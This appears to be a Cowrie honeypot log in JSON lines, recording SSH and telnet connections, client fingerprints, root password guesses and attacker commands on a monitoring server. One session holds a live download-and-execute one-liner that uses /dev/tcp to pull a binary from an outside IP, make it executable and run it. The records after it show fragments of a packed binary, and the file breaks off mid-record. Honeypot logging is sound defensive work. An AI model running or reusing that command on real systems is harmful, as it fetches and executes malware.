{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T16:07:12.001620Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T16:07:12.652283Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:07:13.864969Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:07:14.827862Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T16:07:14.829320Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:07:16.259080Z","src_ip":"212.227.125.160","session":"2a29376c2e5c"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Yn9EvM6H0m && chmod +x /tmp/Yn9EvM6H0m && /tmp/Yn9EvM6H0m oONOakKL8DH4i0trTO3V2flJbEuR8yD5i0htSO3T1PNRZEif9zDwkUJ8TvHYz/JLaFSU+TDvl0xmSfPQ0fRfZFSU8jjvlElqUfLU1PlJbEuU8M/OMUP2hpYrVyOMH04NLgkG\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Yn9EvM6H0m && chmod +x /tmp/Yn9EvM6H0m && /tmp/Yn9EvM6H0m oONOakKL8DH4i0trTO3V2flJbEuR8yD5i0htSO3T1PNRZEif9zDwkUJ8TvHYz/JLaFSU+TDvl0xmSfPQ0fRfZFSU8jjvlElqUfLU1PlJbEuU8M/OMUP2hpYrVyOMH04NLgkG\" &","sensor":"my-vps","timestamp":"2025-09-08T16:07:21.051630Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/DGHRjzuWru","message":"CMD: head -c 1458464 > /tmp/DGHRjzuWru","sensor":"my-vps","timestamp":"2025-09-08T16:07:21.055316Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T16:07:21.277521Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T16:07:21.283960Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T16:07:21.288886Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9a198466ccb14c98c1442e2eb36c4db462a7135b6d146d048ae9ae29e91d1e56","size":1948,"shasum":"9a198466ccb14c98c1442e2eb36c4db462a7135b6d146d048ae9ae29e91d1e56","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/9a198466ccb14c98c1442e2eb36c4db462a7135b6d146d048ae9ae29e91d1e56 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:07:21.290796Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:07:21.292686Z","src_ip":"8.138.136.155","session":"294121491766"}
{"eventid":"cowrie.session.connect","src_ip":"193.46.255.99","src_port":46932,"dst_ip":"1.2.3.4","dst_port":22,"session":"f93e121e1897","protocol":"ssh","message":"New connection: 193.46.255.99:46932 (1.2.3.4:22) [session: f93e121e1897]","sensor":"my-vps","timestamp":"2025-09-08T16:07:30.598249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:07:30.599149Z","src_ip":"193.46.255.99","session":"f93e121e1897"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:07:30.629016Z","src_ip":"193.46.255.99","session":"f93e121e1897"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:07:30.831498Z","src_ip":"193.46.255.99","session":"f93e121e1897"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61548,"dst_ip":"1.2.3.4","dst_port":22,"session":"b04643063296","protocol":"ssh","message":"New connection: 212.227.235.229:61548 (1.2.3.4:22) [session: b04643063296]","sensor":"my-vps","timestamp":"2025-09-08T16:07:41.522138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:07:41.523130Z","src_ip":"212.227.235.229","session":"b04643063296"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:07:41.629510Z","src_ip":"212.227.235.229","session":"b04643063296"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:07:42.139943Z","src_ip":"212.227.235.229","session":"b04643063296"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58748,"dst_ip":"1.2.3.4","dst_port":22,"session":"642749948277","protocol":"ssh","message":"New connection: 217.72.205.35:58748 (1.2.3.4:22) [session: 642749948277]","sensor":"my-vps","timestamp":"2025-09-08T16:09:03.058111Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:09:03.059493Z","src_ip":"217.72.205.35","session":"642749948277"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14510,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a7740dbd840","protocol":"ssh","message":"New connection: 212.227.235.229:14510 (1.2.3.4:22) [session: 0a7740dbd840]","sensor":"my-vps","timestamp":"2025-09-08T16:09:26.020346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:09:26.021849Z","src_ip":"212.227.235.229","session":"0a7740dbd840"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:09:26.124935Z","src_ip":"212.227.235.229","session":"0a7740dbd840"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:09:26.581521Z","src_ip":"212.227.235.229","session":"0a7740dbd840"}
{"eventid":"cowrie.session.connect","src_ip":"91.224.92.108","src_port":38514,"dst_ip":"1.2.3.4","dst_port":22,"session":"829c7a443bf2","protocol":"ssh","message":"New connection: 91.224.92.108:38514 (1.2.3.4:22) [session: 829c7a443bf2]","sensor":"my-vps","timestamp":"2025-09-08T16:10:07.379908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:10:07.380901Z","src_ip":"91.224.92.108","session":"829c7a443bf2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:10:07.395921Z","src_ip":"91.224.92.108","session":"829c7a443bf2"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:10:07.540224Z","src_ip":"91.224.92.108","session":"829c7a443bf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37062,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7c4bbb74d91","protocol":"ssh","message":"New connection: 212.227.235.229:37062 (1.2.3.4:22) [session: f7c4bbb74d91]","sensor":"my-vps","timestamp":"2025-09-08T16:12:09.890194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:12:09.893236Z","src_ip":"212.227.235.229","session":"f7c4bbb74d91"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:12:09.999014Z","src_ip":"212.227.235.229","session":"f7c4bbb74d91"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:12:10.505771Z","src_ip":"212.227.235.229","session":"f7c4bbb74d91"}
{"eventid":"cowrie.session.connect","src_ip":"193.46.255.244","src_port":37690,"dst_ip":"1.2.3.4","dst_port":22,"session":"d969875bbdca","protocol":"ssh","message":"New connection: 193.46.255.244:37690 (1.2.3.4:22) [session: d969875bbdca]","sensor":"my-vps","timestamp":"2025-09-08T16:12:48.349555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:12:48.350810Z","src_ip":"193.46.255.244","session":"d969875bbdca"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:12:48.380742Z","src_ip":"193.46.255.244","session":"d969875bbdca"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:12:48.581839Z","src_ip":"193.46.255.244","session":"d969875bbdca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34454,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae9678426c0f","protocol":"telnet","message":"New connection: 212.227.235.229:34454 (1.2.3.4:23) [session: ae9678426c0f]","sensor":"my-vps","timestamp":"2025-09-08T16:13:01.955780Z"}
{"eventid":"cowrie.session.closed","duration":31.466405391693115,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:13:33.422092Z","src_ip":"212.227.235.229","session":"ae9678426c0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56858,"dst_ip":"1.2.3.4","dst_port":22,"session":"4694b627abef","protocol":"ssh","message":"New connection: 212.227.235.229:56858 (1.2.3.4:22) [session: 4694b627abef]","sensor":"my-vps","timestamp":"2025-09-08T16:14:47.671114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:14:47.671755Z","src_ip":"212.227.235.229","session":"4694b627abef"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:14:47.775721Z","src_ip":"212.227.235.229","session":"4694b627abef"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:14:48.273896Z","src_ip":"212.227.235.229","session":"4694b627abef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60079,"dst_ip":"1.2.3.4","dst_port":23,"session":"e7fe93cb9754","protocol":"telnet","message":"New connection: 212.227.125.160:60079 (1.2.3.4:23) [session: e7fe93cb9754]","sensor":"my-vps","timestamp":"2025-09-08T16:15:15.787037Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.46.255.99","src_port":26108,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3292ff48a45","protocol":"ssh","message":"New connection: 193.46.255.99:26108 (1.2.3.4:22) [session: a3292ff48a45]","sensor":"my-vps","timestamp":"2025-09-08T16:15:17.465500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:15:17.467317Z","src_ip":"193.46.255.99","session":"a3292ff48a45"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:15:17.497316Z","src_ip":"193.46.255.99","session":"a3292ff48a45"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:15:17.698167Z","src_ip":"193.46.255.99","session":"a3292ff48a45"}
{"eventid":"cowrie.session.closed","duration":8.106109857559204,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:15:23.893076Z","src_ip":"212.227.125.160","session":"e7fe93cb9754"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62160,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff8c5dec0a2","protocol":"ssh","message":"New connection: 217.72.205.35:62160 (1.2.3.4:22) [session: 2ff8c5dec0a2]","sensor":"my-vps","timestamp":"2025-09-08T16:15:51.583828Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:15:51.584888Z","src_ip":"217.72.205.35","session":"2ff8c5dec0a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12948,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf55eede94ad","protocol":"ssh","message":"New connection: 212.227.235.229:12948 (1.2.3.4:22) [session: bf55eede94ad]","sensor":"my-vps","timestamp":"2025-09-08T16:17:11.264575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:17:11.265451Z","src_ip":"212.227.235.229","session":"bf55eede94ad"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-c